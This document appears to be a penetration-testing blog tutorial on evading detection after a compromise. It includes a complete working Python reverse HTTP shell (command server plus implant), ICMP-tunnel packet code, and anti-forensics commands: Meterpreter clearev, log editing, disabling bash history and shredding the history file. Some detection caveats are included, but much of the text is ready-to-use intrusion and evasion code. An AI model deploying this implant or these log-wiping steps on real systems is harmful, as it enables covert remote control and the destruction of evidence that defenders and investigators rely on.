Covering Tracks for Ethical Hackers in Penetration Testing.
Covering tracks, or clearing tracks, is the final stage of the penetration testing methodology. White hat hackers, like the real attackers they emulate, cover their tracks to maintain their access to the system and to avoid detection by incident response or forensics teams. Here I explain different types of covering tracks, because most ethical hackers or penetration testers do not actually focus on this last stage of the methodology, which means they fail to make themselves anonymous.
Reverse HTTP Shells:
A shell is code that executes commands on a device such as a server or a mobile phone. The intruder installs a reverse HTTP shell on the target system and uses it to carry communications between the target and the attacker's server. A reverse shell is designed so that the target device always initiates the connection: it periodically polls the attacker's web server for commands, executes them, and returns the output over the same channel. This works because outbound port 80 (HTTP) is almost always open, so the traffic is not flagged by the network's perimeter security devices such as firewalls; a port-based firewall reads it as benign, trusted HTTP traffic and allows the communication between the devices. The hacker can then pull information from the compromised host with very little trace, since all the host did was send HTTP requests. The caveat is that "very little trace" is not "no footprint": an egress web proxy still logs every request, and a beacon polling an unfamiliar host at a fixed interval is one of the patterns detection teams hunt for.
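As an added example (this is not code from the original post, and not any particular tool's protocol), here is a minimal working reverse HTTP shell with both ends of the exchange, run against a loopback server. The path /index.html, the base64 framing of commands, the JSON result field and the browser-like User-Agent are my own choices made for illustration.

```python
# Added example (not from the original post): both ends of a minimal reverse HTTP shell.
# The "implant" runs on the victim and only ever makes outbound HTTP requests to the
# operator's server, which is what lets port-based firewall rules wave it through.
import base64
import json
import queue
import subprocess
import threading
import time
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Browser-like header so the beacon blends in with ordinary web traffic (assumption: the
# target's egress filtering only checks ports, not proxy logs or beaconing patterns).
BEACON_HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}


class C2Server:
    """Operator side: GET /index.html hands out the next queued command (base64 in the
    body, so it looks like opaque page content); POST /index.html receives the result."""

    def __init__(self, host="127.0.0.1"):
        self.tasks = queue.Queue()
        self.results = []
        self.httpd = HTTPServer((host, 0), self._handler())  # port 0: OS picks a free port
        self.port = self.httpd.server_address[1]
        threading.Thread(target=self.httpd.serve_forever, daemon=True).start()

    def _handler(self):
        c2 = self

        class Handler(BaseHTTPRequestHandler):
            def log_message(self, *args):  # silence the default stderr access log
                pass

            def do_GET(self):
                try:
                    cmd = c2.tasks.get_nowait()
                except queue.Empty:
                    cmd = ""  # nothing to do: reply with an empty "page"
                body = base64.b64encode(cmd.encode())
                self.send_response(200)
                self.send_header("Content-Type", "text/html")
                self.send_header("Content-Length", str(len(body)))
                self.end_headers()
                self.wfile.write(body)

            def do_POST(self):
                length = int(self.headers.get("Content-Length", "0"))
                data = json.loads(self.rfile.read(length))
                c2.results.append(base64.b64decode(data["r"]).decode(errors="replace"))
                self.send_response(204)
                self.end_headers()

        return Handler

    def queue_task(self, cmd):
        self.tasks.put(cmd)

    def shutdown(self):
        self.httpd.shutdown()
        self.httpd.server_close()


# ProxyHandler({}) ignores http_proxy environment variables so the demo stays on loopback.
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def implant_poll_once(url):
    """Victim side: fetch one task, run it through the local shell, post the output back.
    Returns the command that was executed, or None if the server had nothing queued."""
    with _opener.open(urllib.request.Request(url, headers=BEACON_HEADERS), timeout=5) as resp:
        cmd = base64.b64decode(resp.read()).decode()
    if not cmd:
        return None
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=30)
    payload = json.dumps({"r": base64.b64encode((proc.stdout + proc.stderr).encode()).decode()})
    req = urllib.request.Request(url, data=payload.encode(), method="POST",
                                 headers={**BEACON_HEADERS, "Content-Type": "application/json"})
    with _opener.open(req, timeout=5):
        pass
    return cmd


def run_demo(commands=("echo c2-test",), interval=0.05, deadline=10.0):
    """Drive the whole exchange on loopback: queue commands, let the implant beacon at a
    fixed interval (that regularity is itself a detection signal), collect the results."""
    c2 = C2Server()
    for cmd in commands:
        c2.queue_task(cmd)
    url = f"http://127.0.0.1:{c2.port}/index.html"
    end = time.monotonic() + deadline
    try:
        while len(c2.results) < len(commands) and time.monotonic() < end:
            implant_poll_once(url)
            time.sleep(interval)
    finally:
        c2.shutdown()
    return c2.results


if __name__ == "__main__":
    for line in run_demo(("echo c2-test", "echo second task")):
        print(repr(line))
```

Run it as a plain script; it starts the server on an ephemeral loopback port, lets the implant fetch and execute two harmless echo commands, and prints what came back. On a real network the only thing separating this from a browser session, from a port-based firewall's point of view, is the destination; a proxy log or a beacon-interval analysis still sees it.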
ICMP Tunnels:
ICMP (Internet Control Message Protocol) is used by network devices to test connectivity, that is, to find out whether a host is reachable or alive. Unlike TCP (Transmission Control Protocol) or UDP (User Datagram Protocol), which carry application data, ICMP is normally used only for echo requests, their echo replies, and error messages. Attackers encapsulate TCP payloads inside the data field of these echo requests and forward them to a proxy server under their control. The proxy de-capsulates each request, extracts the payload, and delivers it to the hacker's side of the tunnel (replies travel back the same way, inside echo replies). Security devices that only look at headers read this as a simple ICMP packet exchange, which helps the hacker cover their tracks. Note that this depends on the perimeter allowing outbound ICMP at all; blocking it, or alerting on echo traffic with unusually large or frequent payloads, breaks the tunnel.
ICMP packet at the network layer (Ethernet MTU of 1500 bytes):
- IP header: 20 bytes
- ICMP header: 8 bytes
- ICMP payload (the DATA field): 1472 bytes maximum
- MTU (Maximum Transmission Unit) 1500 = 20 + 8 + 1472
A ping command sends an ICMP echo request to the target host. The target host responds with an echo reply, which shows that it is alive.
Information about two tools for ICMP tunnelling can be found in the following reference:
Reference: https://www.hackingarticles.in/command-and-control-tunnelling-via-icmp/
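As an added example (not code from the original post or from the tools in the reference), here is the packet-level mechanics of the tunnel described above: building ICMP echo packets with the header layout shown, placing a TCP payload in the data field, splitting it so every packet fits the MTU, reassembling on the proxy side, and a size-based check a defender could apply. Nothing is put on the wire (raw ICMP sockets need root), and the embedded HTTP request is a constructed stand-in for real tunnelled data.

```python
# Added example (not from the original post): the ICMP echo framing an ICMP tunnel rides on.
import struct

IP_HEADER = 20          # IPv4 header without options
ICMP_HEADER = 8         # type, code, checksum, identifier, sequence
MTU = 1500              # Ethernet MTU
MAX_PAYLOAD = MTU - IP_HEADER - ICMP_HEADER   # 1472 bytes of ICMP data
ECHO_REQUEST, ECHO_REPLY = 8, 0


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (odd length is zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(payload: bytes, ident: int, seq: int, reply: bool = False) -> bytes:
    """Wrap arbitrary bytes in an ICMP echo request/reply. ident doubles as the tunnel
    session id and seq as the chunk number: the same fields ping already uses."""
    if len(payload) > MAX_PAYLOAD:
        raise ValueError("payload of %d bytes would exceed the MTU" % len(payload))
    kind = ECHO_REPLY if reply else ECHO_REQUEST
    header = struct.pack("!BBHHH", kind, 0, 0, ident & 0xFFFF, seq & 0xFFFF)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", kind, 0, csum, ident & 0xFFFF, seq & 0xFFFF) + payload


def parse_echo(packet: bytes):
    """Inverse of build_echo: verify the checksum, return (type, ident, seq, payload)."""
    if len(packet) < ICMP_HEADER:
        raise ValueError("truncated ICMP packet")
    kind, code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:ICMP_HEADER])
    if kind not in (ECHO_REQUEST, ECHO_REPLY) or code != 0:
        raise ValueError("not an echo packet")
    if icmp_checksum(packet) != 0:   # a valid packet sums to zero once the checksum is included
        raise ValueError("bad checksum")
    return kind, ident, seq, packet[ICMP_HEADER:]


def tunnel_send(tcp_payload: bytes, session: int) -> list:
    """Client side of the tunnel: split a TCP segment's data into echo requests that each
    fit inside one MTU-sized IP packet (IP header + ICMP header + data <= 1500)."""
    chunks = [tcp_payload[i:i + MAX_PAYLOAD] for i in range(0, len(tcp_payload), MAX_PAYLOAD)]
    return [build_echo(chunk, session, seq) for seq, chunk in enumerate(chunks)]


def tunnel_receive(packets: list, session: int) -> bytes:
    """Proxy side: de-capsulate the echo requests belonging to one session and reassemble
    them in sequence order (packets may arrive reordered, so sort on seq)."""
    pieces = {}
    for pkt in packets:
        kind, ident, seq, data = parse_echo(pkt)
        if kind == ECHO_REQUEST and ident == session:
            pieces[seq] = data
    return b"".join(pieces[s] for s in sorted(pieces))


def looks_like_tunnel(packet: bytes, normal_sizes=(32, 56)) -> bool:
    """Simple defender heuristic (assumption: a stock ping carries 32 bytes of data on
    Windows or 56 on Linux). Echo traffic with other sizes, above all MTU-filling ones,
    deserves a closer look; a real detector would also watch rate and payload entropy."""
    _, _, _, data = parse_echo(packet)
    return len(data) not in normal_sizes


# Constructed sample: an HTTP request that a real tunnel would carry inside TCP.
SAMPLE_TCP_PAYLOAD = b"GET /secret HTTP/1.1\r\nHost: internal.example\r\n\r\n" + b"A" * 3000

if __name__ == "__main__":
    pkts = tunnel_send(SAMPLE_TCP_PAYLOAD, session=0x1234)
    print(len(pkts), "echo requests; largest is",
          max(len(p) for p in pkts) + IP_HEADER, "bytes on the wire including the IP header")
    print("reassembled OK:", tunnel_receive(pkts, 0x1234) == SAMPLE_TCP_PAYLOAD)
    print("flagged by size check:", [looks_like_tunnel(p) for p in pkts])
```

Two things worth noticing when you run it: the 3048-byte payload needs three echo requests, two of them exactly 1500 bytes once the IP header is counted, and every one of them fails the size heuristic, which is why ICMP tunnelling tools bother to fragment into ping-sized chunks and pace their traffic rather than fill the MTU.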
Clearing Event Logs:
a. Clearing Log from Metasploit:
In newer versions of Metasploit's Meterpreter there is a command, clearev, that clears all event logs. It goes into the event logs on a Windows system and clears out ALL of them. This might look a little suspicious to a vigilant system admin (clearing the Security log itself leaves a "log cleared" record, Event ID 1102, as the first new entry, and clearing the System log leaves Event ID 104), but most system admins are NOT vigilant. At the very least, it removes our connection and/or attempted connection from the log files. Of course, there may be other evidence left behind, such as router logs and IDS logs, but we'll deal with those in a future tutorial.
First, use Metasploit to compromise the system and get a Meterpreter command prompt. Once we have a Meterpreter session on the system, we can simply type:
• meterpreter > clearev
After this, all of the event logs (Application, System, and Security) have been cleared from the log files on the victim system.
b. Clearing Event Logs on Linux Computers:
On Linux, the classic log files under /var/log (for example auth.log, syslog, or secure, depending on the distribution) are plain text, so they can be opened and edited in a text editor; kwrite is one such editor. Keep in mind that systemd-based distributions also keep a binary journal (read with journalctl) that a text editor does not touch, and that editing a log file changes its modification time, which is itself a clue for a forensic analyst.
c. Erasing the Command History:-
Before we leave the compromised Linux system, we want to make certain that our command history is erased. Remember, the bash shell we're typing in saves our recent commands (500 by default, often more on distributions that raise the limit). A system admin could read all of our commands, detect and decipher our activities on the system, and potentially use them as evidence. To see what is currently stored, type:
- more ~/.bash_history
The number of commands kept in memory is determined by the environment variable HISTSIZE. We can check its value by typing:
echo $HISTSIZE
and disable history for the current shell with:
export HISTSIZE=0
Now our shell will not keep any history. If you set it to zero before beginning the hack, none of your commands will be stored. Note that HISTSIZE only governs the in-memory list: commands already saved to ~/.bash_history stay there, and the file is only truncated to HISTFILESIZE when the shell exits, so if you have already run some commands, also set HISTFILESIZE to zero before logging out, or shred the file as described in the next section.
d. Shredding the History File:-
Sometimes we won’t have enough time to erase the history file or change the HISTSIZE variable. In a hurry, we can simply shred our history file by typing:
- shred -zu /root/.bash_history
The shred command with the -z and -u switches overwrites the history file (finishing with a pass of zeros) and then deletes it. Bear in mind that shred only reliably destroys data on filesystems that overwrite blocks in place; on journaling, copy-on-write or snapshotting filesystems and on SSDs, older copies of the data may survive. To check that our history has been shredded, we can try to view the history file by typing:
- more /root/.bash_history
Thank you, I hope you will find it useful.
Have a great day and stay safe. _/(‘_’)\_